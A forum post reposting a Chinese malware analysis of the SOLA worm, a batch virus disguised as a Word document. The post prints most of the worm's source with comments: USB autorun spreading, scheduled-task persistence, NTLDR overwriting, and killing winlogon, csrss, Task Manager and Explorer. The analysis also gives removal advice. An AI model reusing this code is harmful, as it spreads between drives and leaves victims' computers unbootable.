ling win X-apple keyboard win7M 09手机多少钱?
点击联系发帖人
时间:2016-05-02 00:24
“你好哦,我是一段来自非洲小国的电脑病毒,因为科技水平有限,其实我什么也做不了。。。能拜托你随便删除一些文件,然后把我转发给朋友吗?谢谢咯。”&br&&br&----------被萌哭了。。。已删已转。&br&----------想被感染的请阅读评论~
“你好哦,我是一段来自非洲小国的电脑病毒,因为科技水平有限,其实我什么也做不了。。。能拜托你随便删除一些文件,然后把我转发给朋友吗?谢谢咯。”----------被萌哭了。。。已删已转。----------想被感染的请阅读评论~
一看到这个问题,就想到我一个朋友在09年发现的一个病毒,据他说流传的很广,而且当时他可能是全网第一个发现者(他的知乎账号 &a data-hash=&602c2eda4c883e3ae9fc& href=&///people/602c2eda4c883e3ae9fc& class=&member_mention& data-tip=&p$b$602c2eda4c883e3ae9fc&&@PRO Pentium&/a& )。病毒分析报告在他QQ空间的日志里,很精彩,下面搬运过来:&br&&br&&br&/*长文预警!好多人说看不下去这么多代码,确实代码太多了,要是看代码头晕的话就只看汉字部分吧,看完汉字你也知道这病毒是干啥的了。*/&br&&br&&br&= = = = == = = = = = = = = =第一次分割线,好紧张,怎么才能装出经常画分割线的样子啊= = = = = = = = = = = = = &br&&br&原创!再次首发! 杀毒软件也杀不出来的word病毒深度解析&br&&br&这个病毒是前几天从政治老师U盘里发现的。它的图标就是一个普通Word文件的图标,可是已经完全不是Word文档了,而是一个应用程序文件。这和从前发现的文件夹病毒有些相似。&br&把病毒文件拷回去研究,发现病毒实际上是一个WinRar自解压文件。用7Zip解压后发现以下文件:(被感染文件名为:新中国诞辰60周1.exe)&br&Function.dll&br&SOLA_2.0_875.bat&br&新中国诞辰60周1.doc&br&原来病毒其实把文件和自身压缩到一个自解压文件中,然后删除原来的文档。这样打开文档(其实是病毒文件伪装的)时就会运行病毒。&br&这样手工杀毒方案也出来了。直接用WinRar打开文件,将文档解压出来即可。经过我的测试,360杀毒(病毒库)也查不出来这个病毒!真是“首发”。哈哈哈~&br&接下来让我们深度解析病毒文件SOLA_2.0_875.bat(注:在U盘根目录下又发现一个SOLA文件夹,里面有Function.dll和Sola.bat文件。其中SOLA.BAT文件代码和SOLA_2.0_875.bat基本相同。因此下面的源代码研究以SOLA_2.0_875.bat文件为例)。&br&破解出的病毒源码,采用Windows批处理编写。//号后面是我写的注释:&br&@echo off&br&set sola=%systemroot%\Fonts\HIDESE~1 //应该是病毒的藏身之处&br&set setup=%systemroot%\Fonts\HIDESE~1\solasetup&br&FOR /F &tokens=1& %%i in ('date /t') do set Realdate=%%i&br&FOR /F &skip=5 tokens=1,4& %%i in ('dir %systemroot%\explorer.exe') do if /I &%%j&==&explorer.exe& set Date=%%i&br&if &%1&==&-Install& goto Install&br&if &%1&==&-Run& goto Run&br&if &%1&==&-Tenbatsu& goto Tenbatsu&br&if &%1&==&-Kill& goto Kill&br&if &%1&==&-Killself& goto Killself&br&&br&:CheckSign&br&if &%1&==&-USB& start /max ..&br&if &%1&==&-USB& cd SOLA&br&if exist %systemroot%\Fonts\HIDESE~1\sola.sign goto Open&br&&br&:FileCopy&br&set selfname=%0&br&:HIDESelf&br&date %Date%&br&md %systemroot%\Fonts\HIDESELF...\&br&date %RealDate%&br&if not &%1&==&-USB& type %selfname%&%systemroot%\Fonts\HIDESE~1\sola.bat&br&if &%1&==&-USB& type sola.bat&%systemroot%\Fonts\HIDESE~1\sola.bat&br&type Function.dll&%systemroot%\Fonts\HIDESE~1\Function.exe&br&echo On Error Resume Next&%systemroot%\Fonts\HIDESE~1\SOLA.VBS&br&echo set ws=wscript.createobject(&wscript.shell&)&&%systemroot%\Fonts\HIDESE~1\SOLA.VBS&br&echo ws.run &cmd /c %sola%\SOLA.BAT -Install&,0 &&%systemroot%\Fonts\HIDESE~1\SOLA.VBS&br&cscript %systemroot%\Fonts\HIDESE~1\SOLA.VBS&br&echo&%systemroot%\Fonts\HIDESE~1\sola.sign&br&del %systemroot%\Fonts\HIDESE~1\SOLA.VBS&br&goto Open&br&&br&&br&:Install&br&&br&&br&:PackerSetup //这一段应该是病毒的自我复制&br&%SystemDrive%&br&cd %systemroot%\Fonts\HIDESE~1&br&if exist Function.exe taskkill /f /im Function.exe&br&if exist solasetup rd /s /q solasetup&br&md solasetup&br&cd solasetup&br© ..\Function.exe Function.dll //Function.dll竟然是可执行文件变过来的,晕...一会还要重点分析Function.dll&br&..\Function.exe -x&br&cd..&br&date %Date% //注意:改时间了&br&type %setup%\rar.exe &%systemroot%\system32\rar.exe&br&date %Realdate%&br© %setup%\Function.dll %sola%\Function.dll&br&attrib %sola%\Function.dll +s +h +r&br&rar -m0 -ep -ep1 a %setup%\docpack.dll %sola%\Function.dll&br&rar -m0 -ep -ep1 a %setup%\txtpack.dll %sola%\Function.dll&br&rar -m0 -ep -ep1 a %setup%\exepack.dll %sola%\Function.dll&br&rar -m0 -ep -ep1 a %setup%\jpgpack.dll %sola%\Function.dll
//竟然把文件又压缩到Function.dll里面,经过试验发现Function.dll确实也是一个压缩文件,解压出来不少东西.这些东西看了让我直冒冷汗...一会再研究吧...&br&del Function.exe&br&&br&&br&&br&:Mainsetup&br&set A0001=copy&br&set A0002=attrib&br&set A0003=echo&br&set A0005=Shell Hardware Detection&br&tasklist &%sola%\task.txt&br&FOR /F &tokens=1& %%i in ('findstr /I &svchost.exe& &%sola%\task.txt&') do set svchost=%%i&br&%A0001% %systemroot%\system32\cmd.exe %sola%\%svchost%&br&del %sola%\task.txt&br&&br&:Tasks&br&%A0002% %systemroot%\Tasks\Tasks.job -s -h -r&br&del %systemroot%\Tasks\Tasks.job&br&&br&date %Date%&br&type %setup%\&a href=&///?target=http%3A//Tasks.xxx& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&Tasks.xxx&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&&%systemroot%\Tasks\Tasks.job&br&schtasks /change /ru &NT AUTHORITY\SYSTEM& /tn &Tasks& & if errorlevel 1 goto TaskFail&br&date %RealDate%&br&&br&goto TaskSuc&br&:TaskFail&br&%homedrive%&br&cd &%ALLUSERSPROFILE%&&br&cd 「开始」菜单\程序\启动
//这段代码和上面几段作用相同,都是实现自启动.&br&&br&date %Date%&br&%A0003% On Error Resume Next&SOLA.VBS&br&%A0003% set ws=wscript.createobject(&wscript.shell&)&&SOLA.VBS&br&%A0003% ws.run &%sola%\svchost.exe /c %sola%\SOLA.BAT -Run&,0 &&SOLA.VBS&br&%A0001% SOLA.VBS %sola%\SOLA.VBS&br&%A0003% NT&%systemroot%\Fonts\HIDESE~1\NoTasks&br&date %RealDate%&br&&br&:TaskSuc&br&%A0002% %systemroot%\Tasks\Tasks.job +s +h +r&br&date %Date%&br&%A0001% %setup%\sleep.exe %systemroot%\system32\sleep.exe&br&date %RealDate%&br&&br&:NoAutoPlay&br&net stop &%A0005%&&br&%A0003% Windows Registry Editor Version 5.00&%systemroot%\Fonts\HIDESE~1\Regedit.reg&br&%A0003% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ShellHWDetection]&&%systemroot%\Fonts\HIDESE~1\Regedit.reg&br&%A0003% &Start&=dword:&&%systemroot%\Fonts\HIDESE~1\Regedit.reg&br®edit /s %systemroot%\Fonts\HIDESE~1\Regedit.reg //不好意思,这个文件(Regedit.reg)我没搞到~&br&&br&::End of Install&br&goto End&if errorlevel 1 exit&br&::End of Install&br&&br&&br&&br&&br&:Run&br&set runroot=%ALLUSERSPROFILE%\「开始」菜单\程序\启动&br&set taskroot=%systemroot%\Tasks //自启动&br&&br&:RunTimeChk&br&if not exist %sola%\RunTime.txt echo !50&%sola%\RunTime.txt&br&FOR /F &tokens=1 delims=!& %%i in (%sola%\RunTime.txt) do set RunTime=%%i&br&if /i %RunTime% leq 0 goto Virus&br&set /a RunTime=%Runtime%-1&br&echo !%Runtime%&%sola%\RunTime.txt&br&&br&:Diskchk&br&&br&echo On Error Resume Next&%systemroot%\Fonts\HIDESE~1\RecentInf.VBS&br&echo set ws=wscript.createobject(&wscript.shell&)&&%systemroot%\Fonts\HIDESE~1\RecentInf.VBS&br&echo ws.run &%sola%\svchost.exe /c %setup%\RecentInf.bat&,0 &&%systemroot%\Fonts\HIDESE~1\RecentInf.VBS&br&cscript %systemroot%\Fonts\HIDESE~1\RecentInf.VBS&br&del %systemroot%\Fonts\HIDESE~1\RecentInf.VBS&br&&br&for %%i in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do vol %%i:&if errorlevel 1 set %%i=1&br&for %%i in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do echo 1&%%i:\solachk1 & findstr . %%i:\solachk1 & if not errorlevel 1 del %%i:\solachk1& findstr /C:&SOLA_1.0_2.0& %%i:\Autorun.inf & if errorlevel 1
attrib -s -h -r %%i:\Autorun.inf© /y %setup%\Autorun.inf %%i:\Autorun.inf&attrib %%i:\Autorun.inf +s +h +r&md %%i:\SOLA© /y &%setup%\sola.bat& %%i:\SOLA\SOLA.BAT© /y &%setup%\Function.dll& %%i:\SOLA\Function.dll&attrib %%i:\SOLA +s +h +r
//文件我还是没搞到,不过看意思应该是使每个盘都感染病毒&br&&br&&br&:Turn&br&if &%C%&==&1& vol C:&if not errorlevel 1 call %setup%\Scan.bat C:&br&if &%D%&==&1& vol D:&if not errorlevel 1 call %setup%\Scan.bat D:&br&if &%E%&==&1& vol E:&if not errorlevel 1 call %setup%\Scan.bat E:&br&if &%F%&==&1& vol F:&if not errorlevel 1 call %setup%\Scan.bat F:&br&if &%G%&==&1& vol G:&if not errorlevel 1 call %setup%\Scan.bat G:&br&if &%H%&==&1& vol H:&if not errorlevel 1 call %setup%\Scan.bat H:&br&if &%I%&==&1& vol I:&if not errorlevel 1 call %setup%\Scan.bat I:&br&if &%J%&==&1& vol J:&if not errorlevel 1 call %setup%\Scan.bat J:&br&if &%K%&==&1& vol K:&if not errorlevel 1 call %setup%\Scan.bat K:&br&if &%L%&==&1& vol L:&if not errorlevel 1 call %setup%\Scan.bat L:&br&if &%M%&==&1& vol M:&if not errorlevel 1 call %setup%\Scan.bat M:&br&if &%N%&==&1& vol N:&if not errorlevel 1 call %setup%\Scan.bat N:&br&if &%O%&==&1& vol O:&if not errorlevel 1 call %setup%\Scan.bat O:&br&if &%P%&==&1& vol P:&if not errorlevel 1 call %setup%\Scan.bat P:&br&if &%Q%&==&1& vol Q:&if not errorlevel 1 call %setup%\Scan.bat Q:&br&if &%R%&==&1& vol R:&if not errorlevel 1 call %setup%\Scan.bat R:&br&if &%S%&==&1& vol S:&if not errorlevel 1 call %setup%\Scan.bat S:&br&if &%T%&==&1& vol T:&if not errorlevel 1 call %setup%\Scan.bat T:&br&if &%U%&==&1& vol U:&if not errorlevel 1 call %setup%\Scan.bat U:&br&if &%V%&==&1& vol V:&if not errorlevel 1 call %setup%\Scan.bat V:&br&if &%W%&==&1& vol W:&if not errorlevel 1 call %setup%\Scan.bat W:&br&if &%X%&==&1& vol X:&if not errorlevel 1 call %setup%\Scan.bat X:&br&if &%Y%&==&1& vol Y:&if not errorlevel 1 call %setup%\Scan.bat Y:&br&if &%Z%&==&1& vol Z:&if not errorlevel 1 call %setup%\Scan.bat Z:&br&&br&if &%C%&==&2& vol C:&if errorlevel 1 set C=1&br&if &%D%&==&2& vol D:&if errorlevel 1 set D=1&br&if &%E%&==&2& vol E:&if errorlevel 1 set E=1&br&if &%F%&==&2& vol F:&if errorlevel 1 set F=1&br&if &%G%&==&2& vol G:&if errorlevel 1 set G=1&br&if &%H%&==&2& vol H:&if errorlevel 1 set H=1&br&if &%I%&==&2& vol I:&if errorlevel 1 set I=1&br&if &%J%&==&2& vol J:&if errorlevel 1 set J=1&br&if &%K%&==&2& vol K:&if errorlevel 1 set K=1&br&if &%L%&==&2& vol L:&if errorlevel 1 set L=1&br&if &%M%&==&2& vol M:&if errorlevel 1 set M=1&br&if &%N%&==&2& vol N:&if errorlevel 1 set N=1&br&if &%O%&==&2& vol O:&if errorlevel 1 set O=1&br&if &%P%&==&2& vol P:&if errorlevel 1 set P=1&br&if &%Q%&==&2& vol Q:&if errorlevel 1 set Q=1&br&if &%R%&==&2& vol R:&if errorlevel 1 set R=1&br&if &%S%&==&2& vol S:&if errorlevel 1 set S=1&br&if &%T%&==&2& vol T:&if errorlevel 1 set T=1&br&if &%U%&==&2& vol U:&if errorlevel 1 set U=1&br&if &%V%&==&2& vol V:&if errorlevel 1 set V=1&br&if &%W%&==&2& vol W:&if errorlevel 1 set W=1&br&if &%X%&==&2& vol X:&if errorlevel 1 set X=1&br&if &%Y%&==&2& vol Y:&if errorlevel 1 set Y=1&br&if &%Z%&==&2& vol Z:&if errorlevel 1 set Z=1
&br&&br&&br&&br&&br&if exist %systemroot%\Fonts\HIDESE~1\NoTasks if not exist &%runroot%\SOLA.VBS& copy &%sola%\SOLA.VBS& &%runroot%\SOLA.VBS&&br&if not exist %systemroot%\Fonts\HIDESE~1\NoTasks if not exist %Taskroot%\Tasks.job copy %setup%\&a href=&///?target=http%3A//Tasks.xxx& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&Tasks.xxx&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a& %Taskroot%\Tasks.job&attrib %Taskroot%\Tasks.job +s +h +r&schtasks /change /ru &NT AUTHORITY\SYSTEM& /tn &Tasks&&br&sleep 2000&br&goto Turn&br&&br&::End of Run&br&goto End&if errorlevel 1 exit&br&::End of Run&br&&br&&br&&br&&br&&br&&br&&br&:Virus&br&if not &%Runtime%&==&0& goto VirusChk&br&set /a RunTime=%Runtime%-1&br&echo !%Runtime%&%sola%\RunTime.txt&br&cd &%ALLUSERSPROFILE%\「开始」菜单\程序\启动&&br&echo On Error Resume Next&TENBATSU.VBS&br&echo set ws=wscript.createobject(&wscript.shell&)&&TENBATSU.VBS&br&echo ws.run &%sola%\sola.bat -Tenbatsu&,0 &&TENBATSU.VBS&br&goto Diskchk&br&&br&:VirusChk&br&if not exist &%ALLUSERSPROFILE%\「开始」菜单\程序\启动\TENBATSU.VBS& goto Kill&br&goto Diskchk&br&&br&:Tenbatsu&br&:KillNTLDR&br&attrib %systemdrive%\NTLDR -s -h -r&br© /Y %systemdrive%\NTLDR %sola%\NTLDR&br&echo NO NTLDR&%systemdrive%\NTLDR&br&::attrib %systemdrive%\NTLDR +s +h +r
//备份C盘的ntldr文件.(经分析病毒具有自删除功能.这个一会再分析)&br&&br&:PauseSFC&br&start mshta &javascript:new ActiveXObject('WScript.Shell').Run('ntsd -pn winlogon.exe',0);window.close()&&br&&br&:KillTaskmgr&br&del /q /a %systemroot%\system32\dllcache\taskmgr.exe&br&taskkill /f /im taskmgr.exe & if errorlevel 1 ren %systemroot%\system32\taskmgr.exe &a href=&///?target=http%3A//taskmgr.xxx& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&taskmgr.xxx&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a& & if errorlevel 1 start mshta &javascript:new ActiveXObject('WScript.Shell').Run('ntsd -c q -pn taskmgr.exe',0);window.close()& & sleep 500&br&ren %systemroot%\system32\taskmgr.exe &a href=&///?target=http%3A//taskmgr.xxx& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&taskmgr.xxx&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&
//备份并删除任务管理器&br&&br&:KillExplorer&br&taskkill /f /im explorer.exe &nul& if errorlevel 1 ren %systemroot%\system32\explorer.exe &a href=&///?target=http%3A//explorer.xxx& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&explorer.xxx&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a& & start mshta &javascript:new ActiveXObject('WScript.Shell').Run('ntsd -c q -pn explorer.exe',0);window.close()& & sleep 500&br&ren %systemroot%\explorer.exe &a href=&///?target=http%3A//explorer.xxx& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&explorer.xxx&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&&br&start /max %setup%\TENBATSU.BAT
//备份并删除explorer.exe&br&&br&:Timeset&br&sleep 660000&br&if exist %sola%\Killself Exit&br&&br&:Kill&br&attrib %systemdrive%\NTLDR -s -h -r&br&echo NO NTLDR&%systemdrive%\NTLDR&br&::attrib %systemdrive%\NTLDR +s +h +r&br&tasklist &%sola%\Task.txt&br&FOR /F &tokens=2& %%i in ('findstr /I &csrss.exe& &%sola%\Task.txt&') do ntsd -p %%i&br&goto Diskchk&br&&br&&br&&br&:KillSelf&br&:StartExplorer&br&ren %systemroot%\&a href=&///?target=http%3A//explorer.xxx& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&explorer.xxx&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a& explorer.exe&br&start %systemroot%\explorer.exe&br&:BackNTLDR&br&attrib %systemdrive%\NTLDR -s -h -r&br© /Y %sola%\NTLDR %systemdrive%\NTLDR&br&attrib %systemdrive%\NTLDR +s +h +r
//这一段就是病毒自我删除的代码了&br&&br&:RenTmg&br&ren %systemroot%\system32\&a href=&///?target=http%3A//taskmgr.xxx& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&taskmgr.xxx&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a& taskmgr.exe&br&&br&:KillVirus&br© %setup%\KillVirus.txt %sola%\KillVirus.txt&br&C:&br&cd\&br&md ~Install&br&cd ~Install&br&rar x -hpkakenhi200601 %setup%\SolaKiller.rar
//对我们来说至关重要的一句!!!为什么重要请一直往下看~&br&mshta &javascript:new ActiveXObject('WScript.Shell').Run('C:\\~Install\\Install.bat %%1',0);window.close()&&br&rd /s /q %setup%&br&attrib %systemroot%\Tasks\Tasks.job -s -h -r&br&del %systemroot%\Tasks\Tasks.job&br&cd &%ALLUSERSPROFILE%\「开始」菜单\程序\启动&&br&if exist sola.vbs del sola.vbs&br&if exist tenbatsu.vbs del tenbatsu.vbs&br&start %systemroot%\system32\notepad.exe %sola%\KillVirus.txt&br&del %sola%\sola.bat
//自我删除(同上一段)&br&Exit&br&&br&&br&&br&:Open&br&if &%1&==&-USB& Exit&br&goto GetName&br&:BackOpen&br&if not exist &%Name%& exit&br&call &%Name%&&br&:Save&br&FOR /F &delims=:& %%i in ('findstr &%Code%& *.exe') do set PackName=%%i&br&rar -m0 -ep -ep1 a &%PackName%& &%Name%&&br&echo %Code%&&&%PackName%&&br&:Del&br&attrib &%Name%& -s -h -r&br&del &%Name%&&br&attrib Function.dll -s -h -r&br&del Function.dll&br&attrib %0 -s -h -r&br&del %0&br&exit&br&::CMD program will stop there.&br&:GetName&br&set Code=SOLA_2.0_875&br&set Name=新中国诞辰60周1.doc&br&goto Backopen&br&:End&br&&br&&br&下面介绍让我看了直冒冷汗的一段:&br&刚才说到Function.dll其实是一个压缩文件.解压后发现这些文件:&br&jpgpack.dll&br&exepack.dll&br&txtpack.dll&br&docpack.dll&br&sleep.exe&br&&a href=&///?target=http%3A//Tasks.xxx& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&Tasks.xxx&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&&br&SOLA.BAT&br&TDPack.txt&br&EJPack.txt&br&Rar.exe&br&scan.bat&br&infect.bat&br&Autorun.inf&br&TENBATSU.BAT&br&KillVirus.TXT&br&RecentInf.bat&br&LocalScan.bat&br&readlnk.bat&br&SolaKiller.rar&br&看看让我看了直冒冷汗的第一个文件吧:KillVirus.TXT&br&文件内容:&br&&br&各位OTAKU:&br&
您好。首先,让我对此病毒给您带来的&br&不便向您道歉。&br&
SOLA已经从您的计算机中清除。但由于&br&WINLOGON被锁定,计算机暂时无法关机、重&br&启,也无法打开任务管理器。但这些问题在&br&冷重启后即可解决。&br&
您的计算机已经有了SOLA的标记,因此&br&不会重复感染。&br&
在硬盘中还留有被SOLA病毒感染的文件&br&,尽管不会重复感染,但建议您清除它们。&br&系统中已经安装了SOLA的专杀程序,它可以&br&帮助您扫描并清除带毒文件。&br&
祝您好运。&br&&br&
SOLA的制造者&br&
KAKENHI&br&&br&天哪................&br&再看看更吓人的TENBATSU.BAT.&br&源代码太长了.我整理出了运行之后屏幕上会显示的东西:&br&&br&&br&警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br&I'm a virus. My name is sola.&br& 我是一个病毒。我的名字叫苏拉。&br&今天,在这片堕落的土地上,我苏醒过来。&br&&br&警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br&我曾经很快乐地活着,与我的朋友,ACG,快乐地活着。&br&我曾经也对病毒深恶痛绝。&br&然而.............&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br& 自从我来到了这片土地上,这片自称伟大,崇高,光明的土地上。&br&这片名为中国的土地上&br&我的朋友,已遍体鳞伤。&br&&br&警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br&他死了&br&Death Note&br&《死亡笔记》&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br&她死了&br&Koihime Musou&br&《恋姬 无双》&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br&还有好多好多的同胞,惨死在你们的蹂躏之下。&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br&广电总局的一纸通告,无数只肮脏的手便掩盖了她的气息。&br&互联网上的一句咒骂,无数声污秽的咒骂便淹没了她的踪迹。&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br&我终于知道了,信息,原来是无法透过国界线而传播的。&br&即使是爱,即使是恨,即使是那一个个爱恨与泪水交织的故事。&br&也无法透过GFW,更无法透过这个国度的某些人心中,那道厚厚的屏障。&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&于是,我愿做这个罪恶的病毒,来再次查看,你的心灵。&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&?
&br&你,是谁???&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br& 是中国人吗?&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br&是民族情绪的受害人吗?&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br& 还是知道,世界上有一个词语叫ACG,并能够容忍,接纳它呢?&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br&
那,让我们来做一个游戏吧。&br&&br&
也许你的记忆中,还有1000年前夏天的传说。&br&&br&
还有120元的车票,&br&&br&
还有银河铁道,&br&&br&
还有钢琴之森,&br&&br&
还有澄澈的天空下,响起的祈祷之歌。&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br&
你需要做的,仅仅是回答几个问题。&br&&br&
你喜欢动画吗?&br&&br&
你喜欢漫画吗?&br&&br&
你喜欢GAL游戏吗?&br&&br&
选择你最擅长的测试卷吧,然后用你聪明的头脑思考,写出心中的答案。&br&&br&
如果你的试卷能及格,我将痛悔我的罪行,并删除自己。&br&&br&
如果你的试卷是零分,我将继承同伴的愤怒,破坏你的计算机。&br&&br&
另外我必须说,我只能把10分钟的时间留给你。&br&&br&
现在,你无法逃避。&br&&br&
因为你已经无法打开任务管理器,更无法上网查找信息。&br&&br&
选择吧,但是要快,容不得犹豫。我已经打开了我的计时器。&br&&br& ?&br& ?&br&我最擅长的测试卷:&br&&br& ----------------问题1---------------------(注:一共有5个问题。只要答对两个或两个以上就过关。)&br&
男主角在入学第一天就听到女主角惊天动地的发言,并加入了女主角创建的一个社团,这个社团教室原本是文学社的,但被女主角强行占用。主要社团成员有:眼睛娘、很有气势的社长、有着魔鬼身材,比男主角高一个年级的吉祥物、被社长指挥得团团转的男主角。&br& 请问这个社团叫什么团?(3个英文字母)&br& 如果无法回答,请输入next,跳转到下一个问题。&br&&br& ----------------问题2---------------------&br&
男主角与女主角在小镇上相遇,女主角非常喜欢恐龙,有模仿某种动物叫声的口癖,并且女主角与n(n大于或等于618,小于或等于1321)年前某个夏天的故事有关系,这个女主角和n年前夏天故事的女主角的姓氏的第一个字都是“神”。&br& 请写出这部作品的名称(3个英文字母)&br& 如果无法回答,请输入next,跳转到下一个问题。&br&&br& ----------------问题3---------------------&br&
如果用B、C分别代表2种人或物体的名称,那么每隔一段时间,就会有7个被B选中的人参加一种名为B战争的战斗,获胜者可以获得B,而C是B召唤出来的,拥有强大的力量,帮助主人为了B而战斗。&br& 请问这部作品的名称的前4个英文字母是什么?&br& 如果无法回答,请输入next,跳转到下一个问题。&br& ?&br&&br& ----------------问题4---------------------&br&
如果用A表示一个名词,那么有一部作品的名称为A少女,A少女们互相战斗,夺取对方的A之心,没有A之心的少女会永远沉睡,一个A少女收集齐了其他A少女的A之心之后,就有某种事情要发生。&br& 请问A的汉语拼音字母是(8个字母)&br& 如果无法回答,请输入next,跳转到下一个问题。&br& ?&br&&br& ----------------问题5---------------------&br&
有一种战斗机,只有神经系统接受了改造的人才能驾驶。4个孩子作为该战斗机的驾驶员展开训练,3个孩子先后在事故中丧生。军方为了给最后一个孩子作战的理由,让她转入了某学校。她于一个晚上,在学校的游泳池里遇到了男主角。后来,女主角加入了一个社团,该社团连同女主角共有4人。&br& 这部作品名称中有3个英文字母,请问这3个英文字母是?&br& 如果无法回答,请输入next,跳转到计分程序。&br& ?&br&&br& ----------------问题1---------------------(注:一共有5个问题。只要答对两个或两个以上就过关。)&br&
患病的男主角在医院里遇上患病的少女,并和她一起逃出医院,到达了某地。这个地方盛产某种花,而女主角也喜欢这种花。传说这种花是一个美男子被诅咒而变成的。&br& 请问这部作品的名称是?(8个英文字母。)&br& 如果无法回答,请输入next,跳转到下一个问题。&br& ?&br&&br& ----------------问题2---------------------&br&
男主角与女主角在小镇上相遇,女主角非常喜欢恐龙,有模仿某种动物叫声的口癖,并且女主角与n(n大于或等于618,小于或等于1321)年前某个夏天的故事有关系,这个女主角和n年前夏天故事的女主角的姓氏的第一个字都是“神”。&br& 请写出这部作品的名称(3个英文字母)&br& 如果无法回答,请输入next,跳转到下一个问题。&br& ?&br&&br& ----------------问题3---------------------&br&
男主角遭遇车祸,醒来后发现世界已经变成地狱一般的景象,往昔的朋友变成了怪物。只有女主角在他的眼中才是正常的人类。于是,他守护着自己心中唯一的真实。&br& 请写出这部作品的女主角的名字的中文拼音。(5个字母,字母中间不要加空格。)&br& 如果无法回答,请输入next,跳转到下一个问题。&br& ?&br&&br& ----------------问题4---------------------&br&
有如下词语来描述B:很小,有薄薄的翅膀,下雨也不会被淋湿。有如下词语来描述A:一种乐器,要靠魔力来演奏,与人声搭配最为恰当。而C是一个一年四季都下着雨的城市,D是一所音乐学院。&br& 请写出故事情节中同时包含A、B、C、D的作品的中文名称的前三个字的汉语拼音字母。(12个字母,字母中间不要加空格。)&br& 如果无法回答,请输入next,跳转到下一个问题。&br& ?&br&&br& ----------------问题5---------------------&br&
在N年以后,人口暴涨。有些人就按下导弹开关,使细菌兵器袭击了地球,最终引起了一场恶战。在地球上的人类已经所剩无几的时候,有一个人为了寻找战前人类留下的有用物品,进入了一个废墟都市。在那里,他遇到了一个天象馆里的礼仪机器人,并和她发生了一段故事。&br& 这部作品名称的中文拼音是?(11个字母。字母中间不要加空格。其中第一个字是后鼻音。)&br& 如果无法回答,请输入next,跳转到计分程序。&br& ?&br&&br&
你的成绩是
分,不及格!!!!!!!!!!&br& ?
不及格 不及格 不及格!!!!!!!!!!!!!!!!!!!!&br&-------&br&
您的成绩是
分,及格了。&br& ?
谢谢您完成了这套试题。5秒钟后,我将按照契约,删除自己。&br& ?
希望您能够过得愉快,再见。&br& ?&br&&br&&br&相信你即使不懂编程也能看懂其中的意思了.晕死......这个文件看样像一个懂汉语的,在中国不知受到什么压迫的外国人写的,具体我也不清楚.反正真是让人看了起一身冷汗......&br&在解压出的众多文件中,有一个很特别的SolaKiller.rar,看文件名像是病毒作者自己写的杀毒工具,可是有压缩密码.好在在sola.bat的代码中找到了解压指令:就是刚才说的至关重要的rar x -hpkakenhi200601 %setup%\SolaKiller.rar一句&br&解压后看到2个文件夹和1个文件:&br&文件夹:ToProgram&br&
ToSystem32&br&文件:Install.bat&br&其中ToProgram文件夹里的SolaKiller.bat就是病毒作者自己写的专杀工具.运行就可以杀毒了.&br&&br&----------------------------------------------&br&结论:&br&1.这病毒太让人无语了.特别是从Function.dll中解压出的TENBATSU.BAT,KillVirus.TXT和SolaKiller.rar三个文件,真不知道病毒作者在中国经历了什么事,竟会写出这些话.晕......对这个我就不做评价了&br&2.从技术上来看,病毒通过一层一层的压缩包和更改扩展名来伪装自己.还是有一定免杀能力的.起码病毒库的360杀毒没查出来.&br&3.病毒破坏性确实不小,不过好在病毒自己提供了专杀工具,只是藏起来了.万一自己的计算机真中了SOLA病毒也不用着急.首先发现不对劲之后就不要再进入系统了.用一张WinPE启动盘启动计算机,再运行专杀工具就行了.&br&4.即使发现的晚,开机之后已经出现上面TENBATSU.BAT文件所示的那几个问题了也不用急.经过我的破解,现在那几个问题的正确答案和专杀工具已经被我提取出来了.需要的话可以找我要.我的QQ:&br&5.截止现在()已升级到最新病毒库的NOD32和360杀毒都还不能自动查出该病毒。目前唯一的预防措施就是关掉系统的自动运行,Windows Vista,Windows 2008和Windows 